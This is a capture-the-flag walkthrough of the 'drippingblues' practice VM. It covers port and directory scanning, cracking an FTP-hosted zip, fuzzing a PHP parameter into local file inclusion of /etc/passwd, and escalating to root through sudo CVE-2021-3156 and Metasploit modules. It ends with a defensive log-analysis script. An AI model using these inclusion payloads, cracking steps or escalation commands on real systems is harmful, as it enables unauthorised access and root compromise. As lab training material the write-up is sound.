OSCP Practice Box
Box overview
Box: drippingblues
Difficulty: easy
Techniques: information gathering, rabbit hole, FTP, zip password cracking, ffuf fuzzing, privilege escalation via sudo CVE-2021-3156, privilege escalation via msf
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scanning
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.50
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 20:17 EST
Nmap scan report for 192.168.1.50
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
MAC Address: 08:00:27:D1:A4:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Directory scanning
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.50
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/index.php (Status: 200) [Size: 138]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/robots.txt (Status: 200) [Size: 78]
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
The directory scan turned up the following hint:
Cracking the zip
Logging in to FTP anonymously reveals a zip file.
After downloading it, crack its password:
zip2john respectmydrip.zip > hashzip
john hashzip --wordlist=/usr/share/wordlists/rockyou.txt
Inside are respectmydrip.txt and secret.zip; secret.zip needs another password, and cracking it failed.
Getting a foothold
At first I thought the secret.zip password had to be collected from the page below, and that the extracted content would be the SSH password.
After visiting the page I did not know how to collect all the words, so I looked at someone else's writeup and learned it was a decoy. The real foothold is not here.
https://kerszl.github.io/hacking/walkthrough/drippingblues/
Only after fuzzing index.php did the hint in the FTP text file make sense: it is a parameter name.
ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50/index.php?FUZZ=/etc/passwd --fs=138
Including the following page revealed the SSH password:
http://192.168.1.50/index.php?drip=/etc/dripispowerful.html
Using that password, I logged in as the thugger user.
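From the defender's side, the ffuf run and the drip request above leave a recognisable trail in the web server's access log. The Python below is an added example (not part of the original walkthrough and not the box's own code): it parses constructed Apache combined-format lines, flags parameter values that are absolute paths or traversal sequences, and flags a client that cycled many parameter names against one path, which is what parameter fuzzing looks like server-side. The sample lines and the 4-name threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: client, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log (not real traffic): ffuf cycling parameter names (the unchanged
# 138-byte page that --fs=138 hides from the attacker is still logged by the server),
# the real drip hit, and benign traffic from another client.
SAMPLE_LOG = """\
192.168.1.129 - - [22/Feb/2024:20:40:01 -0500] "GET /index.php?admin=/etc/passwd HTTP/1.1" 200 138 "-" "Fuzz Faster U Fool"
192.168.1.129 - - [22/Feb/2024:20:40:01 -0500] "GET /index.php?file=/etc/passwd HTTP/1.1" 200 138 "-" "Fuzz Faster U Fool"
192.168.1.129 - - [22/Feb/2024:20:40:02 -0500] "GET /index.php?id=/etc/passwd HTTP/1.1" 200 138 "-" "Fuzz Faster U Fool"
192.168.1.129 - - [22/Feb/2024:20:40:02 -0500] "GET /index.php?drip=/etc/passwd HTTP/1.1" 200 1986 "-" "Fuzz Faster U Fool"
192.168.1.129 - - [22/Feb/2024:20:41:10 -0500] "GET /index.php?drip=/etc/dripispowerful.html HTTP/1.1" 200 2049 "-" "Mozilla/5.0"
192.168.1.77 - - [22/Feb/2024:20:41:30 -0500] "GET /index.php?drip=home.html HTTP/1.1" 200 138 "-" "Mozilla/5.0"
192.168.1.77 - - [22/Feb/2024:20:41:31 -0500] "GET /robots.txt HTTP/1.1" 200 78 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one combined-format line into a dict with path and decoded params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes values
    return rec

def lfi_indicators(params):
    """Names of parameters whose value is an absolute path or contains a traversal sequence."""
    return [k for k, v in params if v.startswith("/") or "../" in v or "..\\" in v]

def analyze(lines, fuzz_threshold=4):
    """Return file-inclusion-looking requests and clients that cycled many parameter names."""
    hits, names_seen = [], defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        for name in lfi_indicators(rec["params"]):
            hits.append((rec["ip"], rec["path"], name, dict(rec["params"])[name], rec["size"]))
        # ffuf-style fuzzing: one client, one path, many distinct parameter names
        names_seen[(rec["ip"], rec["path"])].update(k for k, _ in rec["params"])
    fuzzing = {key: len(v) for key, v in names_seen.items() if len(v) >= fuzz_threshold}
    return {"lfi": hits, "fuzzing": fuzzing}
```

Run analyze(SAMPLE_LOG.splitlines()) to see both findings; the same client shows up in both lists, while the benign client that passed a relative filename to drip is not flagged.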
Privilege escalation
I uploaded linpeas.sh to enumerate the host, then tried to escalate with CVE-2021-3156:
https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
sudoedit -s '123123123123'
or
sudoedit -s /
If the response is an error beginning with "sudoedit:" (for example "sudoedit: /: not a regular file") or a segfault, the machine is vulnerable; if the response begins with "usage:", the machine is not vulnerable or has already been patched.
Here my attempt with the following exploit failed. It was probably not compiled correctly; it would need to be compiled on a system of the same version to run successfully.
https://github.com/blasty/CVE-2021-3156
Instead, I escalated directly with msf's built-in modules:
post/multi/recon/local_exploit_suggester
exploit/linux/local/sudo_baron_samedit
Addendum
Likewise, pkexec can also be used to escalate directly to root.
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】drippingblues